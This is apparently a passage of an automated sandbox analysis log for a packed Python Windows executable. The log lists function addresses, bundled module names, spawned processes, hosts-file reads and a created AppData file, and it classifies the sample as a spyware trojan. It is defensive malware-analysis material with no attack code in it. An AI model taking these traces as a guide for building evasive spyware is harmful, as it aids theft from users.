                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE46332_2_00007FFD3FBE4633
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE5DA32_2_00007FFD3FBE5DA3
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE5B0F2_2_00007FFD3FBE5B0F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE5E252_2_00007FFD3FBE5E25
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD82A602_2_00007FFD3FD82A60
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE4E4E2_2_00007FFD3FBE4E4E
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE23F12_2_00007FFD3FBE23F1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD128C02_2_00007FFD3FD128C0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE60DC2_2_00007FFD3FBE60DC
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE6FFF2_2_00007FFD3FBE6FFF
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE1A4B2_2_00007FFD3FBE1A4B
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE1CC12_2_00007FFD3FBE1CC1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE36932_2_00007FFD3FBE3693
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE5A602_2_00007FFD3FBE5A60
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD163802_2_00007FFD3FD16380
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE707C2_2_00007FFD3FBE707C
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE34862_2_00007FFD3FBE3486
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE1B312_2_00007FFD3FBE1B31
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD160802_2_00007FFD3FD16080
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE16222_2_00007FFD3FBE1622
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE72AC2_2_00007FFD3FBE72AC
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE57D12_2_00007FFD3FBE57D1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE3BA22_2_00007FFD3FBE3BA2
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE43592_2_00007FFD3FBE4359
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE47462_2_00007FFD3FBE4746
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE378D2_2_00007FFD3FBE378D
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE38322_2_00007FFD3FBE3832
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE1CFD2_2_00007FFD3FBE1CFD
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE29822_2_00007FFD3FBE2982
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE736A2_2_00007FFD3FBE736A
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE3A852_2_00007FFD3FBE3A85
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE2D0B2_2_00007FFD3FBE2D0B
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE35FD2_2_00007FFD3FBE35FD
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE266C2_2_00007FFD3FBE266C
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE72572_2_00007FFD3FBE7257
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE50AB2_2_00007FFD3FBE50AB
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE53C12_2_00007FFD3FBE53C1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE21352_2_00007FFD3FBE2135
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE59F72_2_00007FFD3FBE59F7
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD999902_2_00007FFD3FD99990
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE4AC52_2_00007FFD3FBE4AC5
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE54CF2_2_00007FFD3FBE54CF
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD818F02_2_00007FFD3FD818F0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE12992_2_00007FFD3FBE1299
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD218102_2_00007FFD3FD21810
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE638E2_2_00007FFD3FBE638E
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE3A8F2_2_00007FFD3FBE3A8F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE4F3E2_2_00007FFD3FBE4F3E
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE216C2_2_00007FFD3FBE216C
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE55102_2_00007FFD3FBE5510
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE65642_2_00007FFD3FBE6564
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE42872_2_00007FFD3FBE4287
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE542F2_2_00007FFD3FBE542F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE50472_2_00007FFD3FBE5047
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE54CA2_2_00007FFD3FBE54CA
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE15C82_2_00007FFD3FBE15C8
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE5BF02_2_00007FFD3FBE5BF0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE44C62_2_00007FFD3FBE44C6
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE560F2_2_00007FFD3FBE560F
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE710D2_2_00007FFD3FBE710D
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE5F102_2_00007FFD3FBE5F10
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBE53A82_2_00007FFD3FBE53A8
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FBFD2602_2_00007FFD3FBFD260
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD211E02_2_00007FFD3FD211E0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FD0D1E02_2_00007FFD3FD0D1E0
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: 2_2_00007FFD3FC052002_2_00007FFD3FC05200
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE698D appears 71 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE2A04 appears 177 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE2734 appears 723 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE1EF1 appears 1909 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE24B9 appears 126 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE483B appears 178 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE688E appears 46 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FE264CA appears 58 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE4D68 appears 41 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE4057 appears 1128 times
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeCode function: String function: 00007FFD3FBE300D appears 100 times
                        Source: C:\Users\user\Desktop\file.exeCode function: String function: 00440490 appears 96 times
                        Source: _overlapped.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: unicodedata.pyd.0.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                        Source: file.exeBinary or memory string: OriginalFilename vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_lzma.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_msi.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_multiprocessing.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_overlapped.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_queue.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_socket.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_sqlite3.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_ssl.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_tkinter.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_uuid.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_zoneinfo.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMCTL32.DLLj% vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_hashlib.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepython39.dll. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameselect.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamesqlite3.dll0 vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametcl86.dllP vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenametk86.dllP vs file.exe
                        Source: file.exe, 00000000.00000002.234568049.0000000000430000.00000004.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibsslH vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamepyexpat.pyd. vs file.exe
                        Source: file.exe, 00000000.00000002.235504122.0000000003519000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelibcryptoH vs file.exe
                        Source: file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamevcruntime140.dllT vs file.exe
                        Source: file.exe, 00000000.00000002.235437016.0000000000650000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameunicodedata.pyd. vs file.exe
                        Source: test.exe.0.drStatic PE information: Number of sections : 11 > 10
                        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
                        Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=552
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=716
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=636
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=640
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=736
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exeJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=552Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=716Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=636Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=640Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exe C:\Users\user\Desktop\file.exe" "--multiprocessing-fork" "parent_pid=6860" "pipe_handle=736Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile created: C:\Users\user\AppData\stinkJump to behavior
                        Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539Jump to behavior
                        Source: classification engineClassification label: mal76.troj.spyw.evad.winEXE@19/44@2/2
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                        Source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                        Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0041DFE0 GetModuleFileNameW,SetConsoleCtrlHandler,CreateDirectoryW,CreateDirectoryW,CreateFileW,CreateFileW,SetFilePointer,SetFilePointer,SetFilePointer,ReadFile,ReadFile,SetFilePointer,ReadFile,malloc,malloc,malloc,CreateFileW,WriteFile,WriteFile,_assert,CloseHandle,FindCloseChangeNotification,GetLastError,FormatMessageA,puts,puts,CreateDirectoryW,GetCurrentProcessId,SetEnvironmentVariableA,GetCommandLineW,CreateProcessW,CloseHandle,CloseHandle,WaitForSingleObject,GetExitCodeProcess,CloseHandle,GetLastError,FormatMessageA,puts,_assert,_assert,_assert,_assert,_assert,_assert,_assert,_assert,GetLastError,FormatMessageA,puts,puts,_assert,_assert,_assert,_assert,puts,_putws,abort,_assert,abort,0_2_0041DFE0
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7052:120:WilError_01
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\onefile_6828_133380419975826539\test.exeFile opened: C:\Users\user\Desktop\pyvenv.cfgJump to behavior
                        Source: file.exeStatic file information: File size 9189187 > 1048576
                        Source: Binary string: D:\_w\2\b\bin\amd64\_socket.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233979809.00007FFD52DF9000.00000002.00000001.01000000.00000007.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_elementtree.pdb source: test.exe, 00000001.00000002.232393816.00007FFD43562000.00000002.00000001.01000000.00000014.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_ssl.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\unicodedata.pdb source: file.exe, 00000000.00000002.235504122.0000000004023000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232132374.00007FFD40B6B000.00000002.00000001.01000000.00000019.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_lzma.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233760323.00007FFD5138D000.00000002.00000001.01000000.0000000A.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\python39.pdb source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231915752.00007FFD40522000.00000002.00000001.01000000.00000005.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_multiprocessing.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.233481520.00007FFD50964000.00000002.00000001.01000000.00000017.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_uuid.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: file.exe, 00000000.00000002.235504122.000000000342C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.231665482.00007FFD3FE2E000.00000002.00000001.01000000.0000000F.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_hashlib.pdb source: file.exe, 00000000.00000002.235504122.0000000003066000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_tkinter.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: C:\A\39\b\libssl-1_1.pdb?? source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232265746.00007FFD40BF5000.00000002.00000001.01000000.00000011.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_zoneinfo.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\_overlapped.pdb source: file.exe, 00000000.00000002.235504122.0000000003090000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\select.pdb source: file.exe, 00000000.00000002.235504122.000000000393C000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.234296791.00007FFD59254000.00000002.00000001.01000000.00000008.sdmp
                        Source: Binary string: C:\A\39\b\libssl-1_1.pdb source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232265746.00007FFD40BF5000.00000002.00000001.01000000.00000011.sdmp
                        Source: Binary string: D:\_w\2\b\bin\amd64\pyexpat.pdb source: file.exe, 00000000.00000002.235504122.00000000035A2000.00000004.00000020.00020000.00000000.sdmp, test.exe, 00000001.00000002.232326114.00007FFD43524000.00000002.00000001.01000000.00000015.sdmp
